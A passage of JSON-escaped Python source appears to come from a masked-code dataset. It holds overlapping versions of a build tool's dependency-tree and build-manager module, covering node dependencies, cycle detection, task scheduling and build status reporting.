self.failed, self.total)\n return progress\n\n\nclass _NodesTree(object):\n __slots__ = 'node2deps', 'dep2nodes', 'tail_nodes'\n\n def __init__(self):\n self.node2deps = {}\n self.dep2nodes = {}\n self.tail_nodes = set()\n\n def __len__(self):\n return len(self.node2deps)\n\n def __hasCycle(self, node, new_deps):\n if node in new_deps:\n return True\n deps = set(new_deps)\n node2deps = self.node2deps\n while deps:\n dep = deps.pop()\n dep_deps = node2deps[dep]\n if node in dep_deps:\n return True\n deps |= dep_deps\n return False\n\n def __depends(self, node, deps):\n node2deps = self.node2deps\n dep2nodes = self.dep2nodes\n try:\n current_node_deps = node2deps[node]\n deps = {dep for dep in deps if not dep.isBuilt()}\n new_deps = deps - current_node_deps\n if not new_deps:\n return\n if self.__hasCycle(node, new_deps):\n raise ErrorNodeDependencyCyclic(node, new_deps)\n self.tail_nodes.discard(node)\n current_node_deps.update(new_deps)\n for dep in new_deps:\n dep2nodes[dep].add(node)\n except KeyError as dep_node:\n raise ErrorNodeDependencyUnknown(node, dep_node.args[0])\n\n def __add(self, nodes):\n for node in nodes:\n if node not in self.node2deps:\n self.node2deps[node] = set()\n self.dep2nodes[node] = set()\n self.tail_nodes.add(node)\n node_srcnodes = node.getSourceNodes()\n node_depnodes = node.getDepNodes()\n self.__add(node_srcnodes)\n self.__add(node_depnodes)\n self.__depends(node, node_srcnodes)\n self.__depends(node, node_depnodes)\n\n def add(self, nodes):\n self.__add(toSequence(nodes))\n\n def depends(self, node, deps):\n deps = toSequence(deps)\n self.__add(deps)\n self.__depends(node, deps)\n\n def removeTail(self, node):\n node2deps = self.node2deps\n try:\n deps = node2deps.pop(node)\n if deps:\n raise InternalErrorRemoveNonTailNode(node)\n except KeyError as node:\n raise InternalErrorRemoveUnknownTailNode(node.args[0])\n tail_nodes = self.tail_nodes\n for dep in self.dep2nodes.pop(node):\n d = node2deps[dep]\n d.remove(node)\n if not d:\n tail_nodes.add(dep)\n\n def popTails(self):\n tails = self.tail_nodes\n self.tail_nodes = set()\n return tails\n\n def __getAllNodes(self, nodes):\n nodes = set(toSequence(nodes))\n all_nodes = set(nodes)\n node2deps = self.node2deps\n while nodes:\n node = nodes.pop()\n try:\n deps = node2deps[node] - all_nodes\n except KeyError as node:\n raise ErrorNodeUnknown(node.args[0])\n all_nodes.update(deps)\n nodes.update(deps)\n return all_nodes\n\n def shrinkTo(self, nodes):\n node2deps = self.node2deps\n dep2nodes = self.dep2nodes\n ignore_nodes = set(node2deps) - self.__getAllNodes(nodes)\n self.tail_nodes -= ignore_nodes\n for node in ignore_nodes:\n del node2deps[node]\n del dep2nodes[node]\n for dep_nodes in dep2nodes.values():\n dep_nodes.difference_update(ignore_nodes)\n\n def selfTest(self):\n if set(self.node2deps) != set(self.dep2nodes):\n raise AssertionError('Not all deps are added')\n all_dep_nodes = set()\n for node in self.dep2nodes:\n if node not in self.node2deps:\n raise AssertionError('Missed node: %s' % (node,))\n node_deps = self.node2deps[node]\n if not node_deps:\n if node not in self.tail_nodes:\n raise AssertionError(\n 'Missed tail node: %s, tail_nodes: %s' % (node,\n self.tail_nodes))\n elif node in self.tail_nodes:\n raise AssertionError('Invalid tail node: %s' % (node,))\n all_dep_nodes |= node_deps\n for dep in node_deps:\n if node not in self.dep2nodes[dep]:\n raise AssertionError(\n 'node not in self.dep2nodes[dep]: dep: %s, node: %s' %\n (dep, node))\n if all_dep_nodes - set(self.dep2nodes):\n raise AssertionError('Not all deps are added')\n\n\nclass _VFiles(object):\n __slots__ = 'names', 'handles'\n\n def __init__(self):\n self.handles = {}\n self.names = {}\n\n def __iter__(self):\n raise TypeError()\n\n def __getitem__(self, builder):\n builder_name = builder.name\n try:\n vfilename = self.names[builder_name]\n except KeyError:\n vfilename = os.path.join(builder.getBuildDir(), '.aql.db')\n self.names[builder_name] = vfilename\n try:\n return self.handles[vfilename]\n except KeyError:\n vfile = ValuesFile(vfilename)\n self.handles[vfilename] = vfile\n return vfile\n\n def close(self):\n for vfile in self.handles.values():\n vfile.close()\n self.handles.clear()\n self.names.clear()\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, backtrace):\n self.close()\n\n\n<mask token>\n\n\nclass _NodeState(object):\n __slots__ = ('initialized', 'check_depends', 'check_replace',\n 'check_split', 'check_actual', 'split_nodes')\n\n def __init__(self):\n self.initialized = False\n self.check_depends = True\n self.check_replace = True\n self.check_split = True\n self.check_actual = True\n self.split_nodes = None\n\n def __str__(self):\n return (\n 'initialized: %s, check_depends: %s, check_replace: %s, check_split: %s, check_actual: %s, split_nodes: %s'\n % (self.initialized, self.check_depends, self.check_replace,\n self.check_split, self.check_actual, self.split_nodes))\n\n\nclass _NodesBuilder(object):\n __slots__ = ('vfiles', 'build_manager', 'task_manager', 'node_states',\n 'building_nodes')\n\n def __init__(self, build_manager, jobs=0, keep_going=False,\n with_backtrace=True):\n self.vfiles = _VFiles()\n self.node_states = {}\n self.building_nodes = {}\n self.build_manager = build_manager\n self.task_manager = TaskManager(num_threads=jobs, stop_on_fail=not\n keep_going, with_backtrace=with_backtrace)\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, backtrace):\n self.close()\n\n def _getNodeState(self, node):\n try:\n state = self.node_states[node]\n except KeyError:\n state = _NodeState()\n self.node_states[node] = state\n return state\n\n def _removeNodeState(self, node):\n try:\n del self.node_states[node]\n except KeyError:\n pass\n\n def _addBuildingNode(self, node, state):\n conflicting_nodes = []\n building_nodes = self.building_nodes\n for name, signature in node.getNamesAndSignatures():\n node_signature = node, signature\n other_node, other_signature = building_nodes.setdefault(name,\n node_signature)\n if other_node is not node:\n if other_signature != signature:\n raise ErrorNodeSignatureDifferent(node)\n conflicting_nodes.append(other_node)\n if conflicting_nodes:\n state.check_actual = True\n self.build_manager.depends(node, conflicting_nodes)\n return True\n return False\n\n def _removeBuildingNode(self, node):\n building_nodes = self.building_nodes\n for name in node.getNames():\n del building_nodes[name]\n\n def isBuilding(self):\n return bool(self.building_nodes)\n\n def _checkPrebuildDepends(self, node):\n dep_nodes = node.buildDepends()\n if dep_nodes:\n self.build_manager.depends(node, dep_nodes)\n return True\n return False\n\n def _checkPrebuildReplace(self, node):\n if node.buildReplace():\n new_node_sources = node.getSourceNodes()\n if new_node_sources:\n self.build_manager.depends(node, new_node_sources)\n return True\n return False\n\n def _checkPrebuildSplit(self, node, state):\n build_manager = self.build_manager\n if state.check_split:\n state.check_split = False\n check_actual = True\n if node.isBatch() and state.check_actual:\n vfile = self.vfiles[node.builder]\n actual = build_manager.isActualNode(node, vfile)\n if actual:\n self._removeNodeState(node)\n build_manager.actualNode(node)\n return True\n check_actual = False\n split_nodes = node.buildSplit()\n if split_nodes:\n state.split_nodes = split_nodes\n for split_node in split_nodes:\n split_state = self._getNodeState(split_node)\n split_state.check_split = False\n split_state.check_depends = False\n split_state.check_replace = False\n split_state.check_actual = check_actual\n split_state.initialized = (split_node.builder is node.\n builder)\n self.build_manager.depends(node, split_nodes)\n return True\n elif state.split_nodes is not None:\n if node.isBatch():\n node._populateTargets()\n else:\n targets = []\n for split_node in state.split_nodes:\n targets += split_node.getTargetValues()\n node.target_values = targets\n self._removeNodeState(node)\n self.build_manager.completedSplitNode(node)\n return True\n return False\n\n def _prebuild(self, node, state):\n if not state.initialized:\n node.initiate()\n state.initialized = True\n if state.check_depends:\n state.check_depends = False\n if self._checkPrebuildDepends(node):\n return True\n if state.check_replace:\n state.check_replace = False\n if self._checkPrebuildReplace(node):\n return True\n if self._checkPrebuildSplit(node, state):\n return True\n return False\n\n def build(self, nodes):\n build_manager = self.build_manager\n vfiles = self.vfiles\n addTask = self.task_manager.addTask\n tasks_check_period = 10\n added_tasks = 0\n changed = False\n for node in nodes:\n node_state = self._getNodeState(node)\n if self._prebuild(node, node_state):\n changed = True\n continue\n if self._addBuildingNode(node, node_state):\n continue\n if node_state.check_actual:\n vfile = vfiles[node.builder]\n actual = build_manager.isActualNode(node, vfile)\n if actual:\n self._removeNodeState(node)\n self._removeBuildingNode(node)\n build_manager.actualNode(node)\n changed = True\n continue\n addTask(node, _buildNode, node)\n added_tasks += 1\n if added_tasks == tasks_check_period:\n changed = self._getFinishedNodes(block=False) or changed\n added_tasks = 0\n self._getFinishedNodes(block=not changed)\n\n def _getFinishedNodes(self, block=True):\n finished_tasks = self.task_manager.finishedTasks(block=block)\n vfiles = self.vfiles\n build_manager = self.build_manager\n for task in finished_tasks:\n node = task.task_id\n error = task.error\n self._removeNodeState(node)\n self._removeBuildingNode(node)\n vfile = vfiles[node.builder]\n if error is None:\n node.save(vfile)\n build_manager.completedNode(node, task.result)\n else:\n if node.isBatch():\n node.save(vfile)\n build_manager.failedNode(node, error)\n return bool(finished_tasks)\n\n def clear(self, nodes):\n vfiles = self.vfiles\n build_manager = self.build_manager\n for node in nodes:\n node_state = self._getNodeState(node)\n node_state.check_actual = False\n if self._prebuild(node, node_state):\n continue\n vfile = vfiles[node.builder]\n node.clear(vfile)\n build_manager.removedNode(node)\n\n def status(self, nodes):\n vfiles = self.vfiles\n build_manager = self.build_manager\n for node in nodes:\n node_state = self._getNodeState(node)\n node_state.check_actual = False\n if self._prebuild(node, node_state):\n continue\n vfile = vfiles[node.builder]\n if build_manager.isActualNode(node, vfile):\n build_manager.actualNodeStatus(node)\n else:\n build_manager.outdatedNodeStatus(node)\n\n def close(self):\n try:\n self.task_manager.stop()\n self._getFinishedNodes(block=False)\n finally:\n self.vfiles.close()\n\n\nclass BuildManager(object):\n __slots__ = ('_nodes', '_built_targets', '_failed_nodes',\n '_built_node_names', 'completed', 'actual', 'explain')\n\n def __init__(self):\n self._nodes = _NodesTree()\n self.__reset()\n\n def __reset(self, build_always=False, explain=False):\n self._built_targets = {}\n self._failed_nodes = {}\n self._built_node_names = set() if build_always else None\n self.completed = 0\n self.actual = 0\n self.explain = explain\n\n def add(self, nodes):\n self._nodes.add(nodes)\n\n def depends(self, node, deps):\n self._nodes.depends(node, deps)\n\n def __len__(self):\n return len(self._nodes)\n\n def selfTest(self):\n self._nodes.selfTest()\n\n def getTailNodes(self):\n return self._nodes.popTails()\n\n def actualNodeStatus(self, node):\n eventNodeActual(node, self.getProgressStr())\n self.actualNode(node)\n\n def outdatedNodeStatus(self, node):\n self._failed_nodes[node] = None\n eventNodeOutdated(node, self.getProgressStr())\n node.shrink()\n\n def isActualNode(self, node, vfile):\n return node.checkActual(vfile, self._built_node_names, self.explain)\n\n def _addToBuiltNodeNames(self, node):\n built_names = self._built_node_names\n if built_names is not None:\n built_names.update(node.getNames())\n\n def completedSplitNode(self, node):\n self._nodes.removeTail(node)\n node.shrink()\n\n def actualNode(self, node):\n self._nodes.removeTail(node)\n self.actual += 1\n node.shrink()\n\n def completedNode(self, node, builder_output):\n self._checkAlreadyBuilt(node)\n self._nodes.removeTail(node)\n self._addToBuiltNodeNames(node)\n self.completed += 1\n eventNodeBuildingFinished(node, builder_output, self.getProgressStr())\n node.shrink()\n\n def failedNode(self, node, error):\n self._failed_nodes[node] = error\n eventNodeBuildingFailed(node, error)\n\n def removedNode(self, node):\n self._nodes.removeTail(node)\n self.completed += 1\n eventNodeRemoved(node, self.getProgressStr())\n node.shrink()\n\n def getProgressStr(self):\n done = self.completed + self.actual\n total = len(self._nodes) + done\n processed = done + len(self._failed_nodes)\n progress = '%s/%s' % (processed, total)\n return progress\n\n def close(self):\n self._nodes = _NodesTree()\n\n def _checkAlreadyBuilt(self, node):\n values = node.getTargetValues()\n built_targets = self._built_targets\n for value in values:\n value_sign = value.signature\n other_value_sign = built_targets.setdefault(value.valueId(),\n value_sign)\n if other_value_sign != value_sign:\n eventBuildTargetTwice(value, node)\n\n def build(self, jobs, keep_going, nodes=None, build_always=False,\n explain=False, with_backtrace=True):\n self.__reset(build_always=build_always, explain=explain)\n nodes_tree = self._nodes\n if nodes is not None:\n nodes_tree.shrinkTo(nodes)\n with _NodesBuilder(self, jobs, keep_going, with_backtrace\n ) as nodes_builder:\n while True:\n tails = self.getTailNodes()\n if not tails and not nodes_builder.isBuilding():\n break\n nodes_builder.build(tails)\n return self.isOk()\n\n def isOk(self):\n return not bool(self._failed_nodes)\n\n def failsCount(self):\n return len(self._failed_nodes)\n\n def printFails(self):\n for node, error in self._failed_nodes.items():\n eventFailedNode(node, error)\n\n def printBuildState(self):\n logInfo('Failed nodes: %s' % len(self._failed_nodes))\n logInfo('Completed nodes: %s' % self.completed)\n logInfo('Actual nodes: %s' % self.actual)\n\n def printStatusState(self):\n logInfo('Outdated nodes: %s' % len(self._failed_nodes))\n logInfo('Actual nodes: %s' % self.actual)\n\n def clear(self, nodes=None):\n self.__reset()\n nodes_tree = self._nodes\n if nodes is not None:\n nodes_tree.shrinkTo(nodes)\n with _NodesBuilder(self) as nodes_builder:\n while True:\n tails = self.getTailNodes()\n if not tails:\n break\n nodes_builder.clear(tails)\n\n def status(self, nodes=None, explain=False):\n self.__reset(explain=explain)\n nodes_tree = self._nodes\n if nodes is not None:\n nodes_tree.shrinkTo(nodes)\n with _NodesBuilder(self) as nodes_builder:\n while True:\n tails = self.getTailNodes()\n if not tails:\n break\n nodes_builder.status(tails)\n return self.isOk()\n", "step-3": "<mask token>\n\n\nclass ErrorNodeSignatureDifferent(AqlException):\n <mask token>\n\n\nclass ErrorNodeDependencyUnknown(AqlException):\n\n def __init__(self, node, dep_node):\n msg = \"Unable to add dependency to node '%s' from node '%s'\" % (node,\n dep_node)\n super(ErrorNodeDependencyUnknown, self).__init__(msg)\n\n\nclass InternalErrorRemoveNonTailNode(AqlException):\n\n def __init__(self, node):\n msg = 'Removing non-tail node: %s' % (node,)\n super(InternalErrorRemoveNonTailNode, self).__init__(msg)\n\n\nclass InternalErrorRemoveUnknownTailNode(AqlException):\n\n def __init__(self, node):\n msg = 'Remove unknown tail node: : %s' % (node,)\n super(InternalErrorRemoveUnknownTailNode, self).__init__(msg)\n\n\nclass BuildStat(object):\n __slots__ = 'total', 'completed', 'failed'\n\n def __init__(self, total):\n self.total = total\n self.completed = 0\n self.failed = 0\n\n def addTotal(self, count):\n self.total += count\n\n def incCompleted(self):\n self.completed += 1\n\n def incFailed(self):\n self.failed += 1\n\n def getProgressStr(self):\n progress = '%s/%s' % (self.completed + self.failed, self.total)\n return progress\n\n\nclass _NodesTree(object):\n __slots__ = 'node2deps', 'dep2nodes', 'tail_nodes'\n\n def __init__(self):\n self.node2deps = {}\n self.dep2nodes = {}\n self.tail_nodes = set()\n\n def __len__(self):\n return len(self.node2deps)\n\n def __hasCycle(self, node, new_deps):\n if node in new_deps:\n return True\n deps = set(new_deps)\n node2deps = self.node2deps\n while deps:\n dep = deps.pop()\n dep_deps = node2deps[dep]\n if node in dep_deps:\n return True\n deps |= dep_deps\n return False\n\n def __depends(self, node, deps):\n node2deps = self.node2deps\n dep2nodes = self.dep2nodes\n try:\n current_node_deps = node2deps[node]\n deps = {dep for dep in deps if not dep.isBuilt()}\n new_deps = deps - current_node_deps\n if not new_deps:\n return\n if self.__hasCycle(node, new_deps):\n raise ErrorNodeDependencyCyclic(node, new_deps)\n self.tail_nodes.discard(node)\n current_node_deps.update(new_deps)\n for dep in new_deps:\n dep2nodes[dep].add(node)\n except KeyError as dep_node:\n raise ErrorNodeDependencyUnknown(node, dep_node.args[0])\n\n def __add(self, nodes):\n for node in nodes:\n if node not in self.node2deps:\n self.node2deps[node] = set()\n self.dep2nodes[node] = set()\n self.tail_nodes.add(node)\n node_srcnodes = node.getSourceNodes()\n node_depnodes = node.getDepNodes()\n self.__add(node_srcnodes)\n self.__add(node_depnodes)\n self.__depends(node, node_srcnodes)\n self.__depends(node, node_depnodes)\n\n def add(self, nodes):\n self.__add(toSequence(nodes))\n\n def depends(self, node, deps):\n deps = toSequence(deps)\n self.__add(deps)\n self.__depends(node, deps)\n\n def removeTail(self, node):\n node2deps = self.node2deps\n try:\n deps = node2deps.pop(node)\n if deps:\n raise InternalErrorRemoveNonTailNode(node)\n except KeyError as node:\n raise InternalErrorRemoveUnknownTailNode(node.args[0])\n tail_nodes = self.tail_nodes\n for dep in self.dep2nodes.pop(node):\n d = node2deps[dep]\n d.remove(node)\n if not d:\n tail_nodes.add(dep)\n\n def popTails(self):\n tails = self.tail_nodes\n self.tail_nodes = set()\n return tails\n\n def __getAllNodes(self, nodes):\n nodes = set(toSequence(nodes))\n all_nodes = set(nodes)\n node2deps = self.node2deps\n while nodes:\n node = nodes.pop()\n try:\n deps = node2deps[node] - all_nodes\n except KeyError as node:\n raise ErrorNodeUnknown(node.args[0])\n all_nodes.update(deps)\n nodes.update(deps)\n return all_nodes\n\n def shrinkTo(self, nodes):\n node2deps = self.node2deps\n dep2nodes = self.dep2nodes\n ignore_nodes = set(node2deps) - self.__getAllNodes(nodes)\n self.tail_nodes -= ignore_nodes\n for node in ignore_nodes:\n del node2deps[node]\n del dep2nodes[node]\n for dep_nodes in dep2nodes.values():\n dep_nodes.difference_update(ignore_nodes)\n\n def selfTest(self):\n if set(self.node2deps) != set(self.dep2nodes):\n raise AssertionError('Not all deps are added')\n all_dep_nodes = set()\n for node in self.dep2nodes:\n if node not in self.node2deps:\n raise AssertionError('Missed node: %s' % (node,))\n node_deps = self.node2deps[node]\n if not node_deps:\n if node not in self.tail_nodes:\n raise AssertionError(\n 'Missed tail node: %s, tail_nodes: %s' % (node,\n self.tail_nodes))\n elif node in self.tail_nodes:\n raise AssertionError('Invalid tail node: %s' % (node,))\n all_dep_nodes |= node_deps\n for dep in node_deps:\n if node not in self.dep2nodes[dep]:\n raise AssertionError(\n 'node not in self.dep2nodes[dep]: dep: %s, node: %s' %\n (dep, node))\n if all_dep_nodes - set(self.dep2nodes):\n raise AssertionError('Not all deps are added')\n\n\nclass _VFiles(object):\n __slots__ = 'names', 'handles'\n\n def __init__(self):\n self.handles = {}\n self.names = {}\n\n def __iter__(self):\n raise TypeError()\n\n def __getitem__(self, builder):\n builder_name = builder.name\n try:\n vfilename = self.names[builder_name]\n except KeyError:\n vfilename = os.path.join(builder.getBuildDir(), '.aql.db')\n self.names[builder_name] = vfilename\n try:\n return self.handles[vfilename]\n except KeyError:\n vfile = ValuesFile(vfilename)\n self.handles[vfilename] = vfile\n return vfile\n\n def close(self):\n for vfile in self.handles.values():\n vfile.close()\n self.handles.clear()\n self.names.clear()\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, backtrace):\n self.close()\n\n\n<mask token>\n\n\nclass _NodeState(object):\n __slots__ = ('initialized', 'check_depends', 'check_replace',\n 'check_split', 'check_actual', 'split_nodes')\n\n def __init__(self):\n self.initialized = False\n self.check_depends = True\n self.check_replace = True\n self.check_split = True\n self.check_actual = True\n self.split_nodes = None\n\n def __str__(self):\n return (\n 'initialized: %s, check_depends: %s, check_replace: %s, check_split: %s, check_actual: %s, split_nodes: %s'\n % (self.initialized, self.check_depends, self.check_replace,\n self.check_split, self.check_actual, self.split_nodes))\n\n\nclass _NodesBuilder(object):\n __slots__ = ('vfiles', 'build_manager', 'task_manager', 'node_states',\n 'building_nodes')\n\n def __init__(self, build_manager, jobs=0, keep_going=False,\n with_backtrace=True):\n self.vfiles = _VFiles()\n self.node_states = {}\n self.building_nodes = {}\n self.build_manager = build_manager\n self.task_manager = TaskManager(num_threads=jobs, stop_on_fail=not\n keep_going, with_backtrace=with_backtrace)\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, backtrace):\n self.close()\n\n def _getNodeState(self, node):\n try:\n state = self.node_states[node]\n except KeyError:\n state = _NodeState()\n self.node_states[node] = state\n return state\n\n def _removeNodeState(self, node):\n try:\n del self.node_states[node]\n except KeyError:\n pass\n\n def _addBuildingNode(self, node, state):\n conflicting_nodes = []\n building_nodes = self.building_nodes\n for name, signature in node.getNamesAndSignatures():\n node_signature = node, signature\n other_node, other_signature = building_nodes.setdefault(name,\n node_signature)\n if other_node is not node:\n if other_signature != signature:\n raise ErrorNodeSignatureDifferent(node)\n conflicting_nodes.append(other_node)\n if conflicting_nodes:\n state.check_actual = True\n self.build_manager.depends(node, conflicting_nodes)\n return True\n return False\n\n def _removeBuildingNode(self, node):\n building_nodes = self.building_nodes\n for name in node.getNames():\n del building_nodes[name]\n\n def isBuilding(self):\n return bool(self.building_nodes)\n\n def _checkPrebuildDepends(self, node):\n dep_nodes = node.buildDepends()\n if dep_nodes:\n self.build_manager.depends(node, dep_nodes)\n return True\n return False\n\n def _checkPrebuildReplace(self, node):\n if node.buildReplace():\n new_node_sources = node.getSourceNodes()\n if new_node_sources:\n self.build_manager.depends(node, new_node_sources)\n return True\n return False\n\n def _checkPrebuildSplit(self, node, state):\n build_manager = self.build_manager\n if state.check_split:\n state.check_split = False\n check_actual = True\n if node.isBatch() and state.check_actual:\n vfile = self.vfiles[node.builder]\n actual = build_manager.isActualNode(node, vfile)\n if actual:\n self._removeNodeState(node)\n build_manager.actualNode(node)\n return True\n check_actual = False\n split_nodes = node.buildSplit()\n if split_nodes:\n state.split_nodes = split_nodes\n for split_node in split_nodes:\n split_state = self._getNodeState(split_node)\n split_state.check_split = False\n split_state.check_depends = False\n split_state.check_replace = False\n split_state.check_actual = check_actual\n split_state.initialized = (split_node.builder is node.\n builder)\n self.build_manager.depends(node, split_nodes)\n return True\n elif state.split_nodes is not None:\n if node.isBatch():\n node._populateTargets()\n else:\n targets = []\n for split_node in state.split_nodes:\n targets += split_node.getTargetValues()\n node.target_values = targets\n self._removeNodeState(node)\n self.build_manager.completedSplitNode(node)\n return True\n return False\n\n def _prebuild(self, node, state):\n if not state.initialized:\n node.initiate()\n state.initialized = True\n if state.check_depends:\n state.check_depends = False\n if self._checkPrebuildDepends(node):\n return True\n if state.check_replace:\n state.check_replace = False\n if self._checkPrebuildReplace(node):\n return True\n if self._checkPrebuildSplit(node, state):\n return True\n return False\n\n def build(self, nodes):\n build_manager = self.build_manager\n vfiles = self.vfiles\n addTask = self.task_manager.addTask\n tasks_check_period = 10\n added_tasks = 0\n changed = False\n for node in nodes:\n node_state = self._getNodeState(node)\n if self._prebuild(node, node_state):\n changed = True\n continue\n if self._addBuildingNode(node, node_state):\n continue\n if node_state.check_actual:\n vfile = vfiles[node.builder]\n actual = build_manager.isActualNode(node, vfile)\n if actual:\n self._removeNodeState(node)\n self._removeBuildingNode(node)\n build_manager.actualNode(node)\n changed = True\n continue\n addTask(node, _buildNode, node)\n added_tasks += 1\n if added_tasks == tasks_check_period:\n changed = self._getFinishedNodes(block=False) or changed\n added_tasks = 0\n self._getFinishedNodes(block=not changed)\n\n def _getFinishedNodes(self, block=True):\n finished_tasks = self.task_manager.finishedTasks(block=block)\n vfiles = self.vfiles\n build_manager = self.build_manager\n for task in finished_tasks:\n node = task.task_id\n error = task.error\n self._removeNodeState(node)\n self._removeBuildingNode(node)\n vfile = vfiles[node.builder]\n if error is None:\n node.save(vfile)\n build_manager.completedNode(node, task.result)\n else:\n if node.isBatch():\n node.save(vfile)\n build_manager.failedNode(node, error)\n return bool(finished_tasks)\n\n def clear(self, nodes):\n vfiles = self.vfiles\n build_manager = self.build_manager\n for node in nodes:\n node_state = self._getNodeState(node)\n node_state.check_actual = False\n if self._prebuild(node, node_state):\n continue\n vfile = vfiles[node.builder]\n node.clear(vfile)\n build_manager.removedNode(node)\n\n def status(self, nodes):\n vfiles = self.vfiles\n build_manager = self.build_manager\n for node in nodes:\n node_state = self._getNodeState(node)\n node_state.check_actual = False\n if self._prebuild(node, node_state):\n continue\n vfile = vfiles[node.builder]\n if build_manager.isActualNode(node, vfile):\n build_manager.actualNodeStatus(node)\n else:\n build_manager.outdatedNodeStatus(node)\n\n def close(self):\n try:\n self.task_manager.stop()\n self._getFinishedNodes(block=False)\n finally:\n self.vfiles.close()\n\n\nclass BuildManager(object):\n __slots__ = ('_nodes', '_built_targets', '_failed_nodes',\n '_built_node_names', 'completed', 'actual', 'explain')\n\n def __init__(self):\n self._nodes = _NodesTree()\n self.__reset()\n\n def __reset(self, build_always=False, explain=False):\n self._built_targets = {}\n self._failed_nodes = {}\n self._built_node_names = set() if build_always else None\n self.completed = 0\n self.actual = 0\n self.explain = explain\n\n def add(self, nodes):\n self._nodes.add(nodes)\n\n def depends(self, node, deps):\n self._nodes.depends(node, deps)\n\n def __len__(self):\n return len(self._nodes)\n\n def selfTest(self):\n self._nodes.selfTest()\n\n def getTailNodes(self):\n return self._nodes.popTails()\n\n def actualNodeStatus(self, node):\n eventNodeActual(node, self.getProgressStr())\n self.actualNode(node)\n\n def outdatedNodeStatus(self, node):\n self._failed_nodes[node] = None\n eventNodeOutdated(node, self.getProgressStr())\n node.shrink()\n\n def isActualNode(self, node, vfile):\n return node.checkActual(vfile, self._built_node_names, self.explain)\n\n def _addToBuiltNodeNames(self, node):\n built_names = self._built_node_names\n if built_names is not None:\n built_names.update(node.getNames())\n\n def completedSplitNode(self, node):\n self._nodes.removeTail(node)\n node.shrink()\n\n def actualNode(self, node):\n self._nodes.removeTail(node)\n self.actual += 1\n node.shrink()\n\n def completedNode(self, node, builder_output):\n self._checkAlreadyBuilt(node)\n self._nodes.removeTail(node)\n self._addToBuiltNodeNames(node)\n self.completed += 1\n eventNodeBuildingFinished(node, builder_output, self.getProgressStr())\n node.shrink()\n\n def failedNode(self, node, error):\n self._failed_nodes[node] = error\n eventNodeBuildingFailed(node, error)\n\n def removedNode(self, node):\n self._nodes.removeTail(node)\n self.completed += 1\n eventNodeRemoved(node, self.getProgressStr())\n node.shrink()\n\n def getProgressStr(self):\n done = self.completed + self.actual\n total = len(self._nodes) + done\n processed = done + len(self._failed_nodes)\n progress = '%s/%s' % (processed, total)\n return progress\n\n def close(self):\n self._nodes = _NodesTree()\n\n def _checkAlreadyBuilt(self, node):\n values = node.getTargetValues()\n built_targets = self._built_targets\n for value in values:\n value_sign = value.signature\n other_value_sign = built_targets.setdefault(value.valueId(),\n value_sign)\n if other_value_sign != value_sign:\n eventBuildTargetTwice(value, node)\n\n def build(self, jobs, keep_going, nodes=None, build_always=False,\n explain=False, with_backtrace=True):\n self.__reset(build_always=build_always, explain=explain)\n nodes_tree = self._nodes\n if nodes is not None:\n nodes_tree.shrinkTo(nodes)\n with _NodesBuilder(self, jobs, keep_going, with_backtrace\n ) as nodes_builder:\n while True:\n tails = self.getTailNodes()\n if not tails and not nodes_builder.isBuilding():\n break\n nodes_builder.build(tails)\n return self.isOk()\n\n def isOk(self):\n return not bool(self._failed_nodes)\n\n def failsCount(self):\n return len(self._failed_nodes)\n\n def printFails(self):\n for node, error in self._failed_nodes.items():\n eventFailedNode(node, error)\n\n def printBuildState(self):\n logInfo('Failed nodes: %s' % len(self._failed_nodes))\n logInfo('Completed nodes: %s' % self.completed)\n logInfo('Actual nodes: %s' % self.actual)\n\n def printStatusState(self):\n logInfo('Outdated nodes: %s' % len(self._failed_nodes))\n logInfo('Actual nodes: %s' % self.actual)\n\n def clear(self, nodes=None):\n self.__reset()\n nodes_tree = self._nodes\n if nodes is not None:\n nodes_tree.shrinkTo(nodes)\n with _NodesBuilder(self) as nodes_builder:\n while True:\n tails = self.getTailNodes()\n if not tails:\n break\n nodes_builder.clear(tails)\n\n def status(self, nodes=None, explain=False):\n self.__reset(explain=explain)\n nodes_tree = self._nodes\n if nodes is not None:\n nodes_tree.shrinkTo(nodes)\n with _NodesBuilder(self) as nodes_builder:\n while True:\n tails = self.getTailNodes()\n if not tails:\n break\n nodes_builder.status(tails)\n return self.isOk()\n", "step-4": "<mask token>\n\n\n@eventStatus\ndef eventNodeOutdated(settings, node, progress):\n msg = '(%s) OUTDATED: %s' % (progress, node.getBuildStr(settings.brief))\n logInfo(msg)\n\n\n<mask token>\n\n\n@eventStatus\ndef eventNodeRemoved(settings, node, progress):\n msg = node.getBuildStr(settings.brief)\n if msg:\n logInfo('(%s) Removed: %s' % (progress, msg))\n\n\nclass ErrorNodeDependencyCyclic(AqlException):\n\n def __init__(self, node, deps):\n msg = \"Node '%s' (%s) has a cyclic dependency: %s\" % (node, node.\n getBuildStr(True), deps)\n super(ErrorNodeDependencyCyclic, self).__init__(msg)\n\n\nclass ErrorNodeUnknown(AqlException):\n\n def __init__(self, node):\n msg = \"Unknown node '%s'\" % (node,)\n super(ErrorNodeUnknown, self).__init__(msg)\n\n\nclass ErrorNodeSignatureDifferent(AqlException):\n\n def __init__(self, node):\n msg = (\n 'Two similar nodes have different signatures (sources, builder parameters or dependencies): %s'\n % (node.getBuildStr(brief=False),))\n super(ErrorNodeSignatureDifferent, self).__init__(msg)\n\n\nclass ErrorNodeDependencyUnknown(AqlException):\n\n def __init__(self, node, dep_node):\n msg = \"Unable to add dependency to node '%s' from node '%s'\" % (node,\n dep_node)\n super(ErrorNodeDependencyUnknown, self).__init__(msg)\n\n\nclass InternalErrorRemoveNonTailNode(AqlException):\n\n def __init__(self, node):\n msg = 'Removing non-tail node: %s' % (node,)\n super(InternalErrorRemoveNonTailNode, self).__init__(msg)\n\n\nclass InternalErrorRemoveUnknownTailNode(AqlException):\n\n def __init__(self, node):\n msg = 'Remove unknown tail node: : %s' % (node,)\n super(InternalErrorRemoveUnknownTailNode, self).__init__(msg)\n\n\nclass BuildStat(object):\n __slots__ = 'total', 'completed', 'failed'\n\n def __init__(self, total):\n self.total = total\n self.completed = 0\n self.failed = 0\n\n def addTotal(self, count):\n self.total += count\n\n def incCompleted(self):\n self.completed += 1\n\n def incFailed(self):\n self.failed += 1\n\n def getProgressStr(self):\n progress = '%s/%s' % (self.completed + self.failed, self.total)\n return progress\n\n\nclass _NodesTree(object):\n __slots__ = 'node2deps', 'dep2nodes', 'tail_nodes'\n\n def __init__(self):\n self.node2deps = {}\n self.dep2nodes = {}\n self.tail_nodes = set()\n\n def __len__(self):\n return len(self.node2deps)\n\n def 